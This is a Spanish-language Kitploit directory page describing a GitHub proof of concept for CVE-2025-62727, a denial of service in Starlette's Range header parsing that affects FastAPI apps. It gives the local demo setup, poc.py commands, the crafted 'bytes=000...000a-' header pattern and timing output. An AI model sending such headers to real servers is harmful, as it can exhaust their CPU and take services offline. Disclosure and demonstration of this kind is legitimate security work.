Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
Análisis de VulnerabilidadesExplotaciónSeguridad WebSeguridad de APIs
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

Prueba de concepto de CVE-2025-62727 que puede causar denegación de servicio en FastAPI (basado en Starlette <= 0.48.0)

Ver Repositorio
124hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Demo CVE-2025-62727

Descripción de la víctima

La víctima objetivo de CVE-2025-62727 es una aplicación FastAPI sencilla que:

  • Sirve Hello World en /.
  • Sirve archivos estáticos bajo /static usando StaticFiles de Starlette.
  • Genera automáticamente archivos de texto que contienen A repetida N veces para N en 1024, 2048, 50176 al iniciar.

Cómo ejecutar la víctima

  1. (Opcional) Crear y activar un virtualenv.

  2. Instalar las dependencias:

    pip install -r requirements.txt
    
  3. Iniciar el servidor:

    uvicorn main:app --reload
    
  4. Abrir:

  • http://127.0.0.1:8000/ para la página de índice.
  • http://127.0.0.1:8000/static/1024.txt etc. para los archivos estáticos.

Notas

  • Los archivos estáticos se generan en el directorio static/ al iniciar la aplicación. Los archivos existentes no se sobrescriben.
  • El servicio estático utiliza StaticFiles de Starlette como se solicitó.

PoC: CVE-2025-62727 (Análisis del encabezado Range)

El poc.py incluido desencadena un análisis de Range con uso intensivo de CPU en FileResponse de Starlette a través de la ruta /static usando un encabezado manipulado de la forma bytes=000...000a-.

Ejecute el servidor y, en otra terminal:

python3 poc.py --sizes 1000,2000,4000,7000

Sobrescriba la URL objetivo (opcional):

python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000

Notas:

  • El PoC apunta a http://127.0.0.1:8000/static/50176.txt por defecto (un archivo que la aplicación genera). Use --url para cambiarlo.
  • Ajuste --sizes hacia abajo si ve 400/431 (encabezado demasiado grande), o hacia arriba si los encabezados tienen éxito y desea un efecto más fuerte.

Ejemplo de resultado:

$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
Descargar herramienta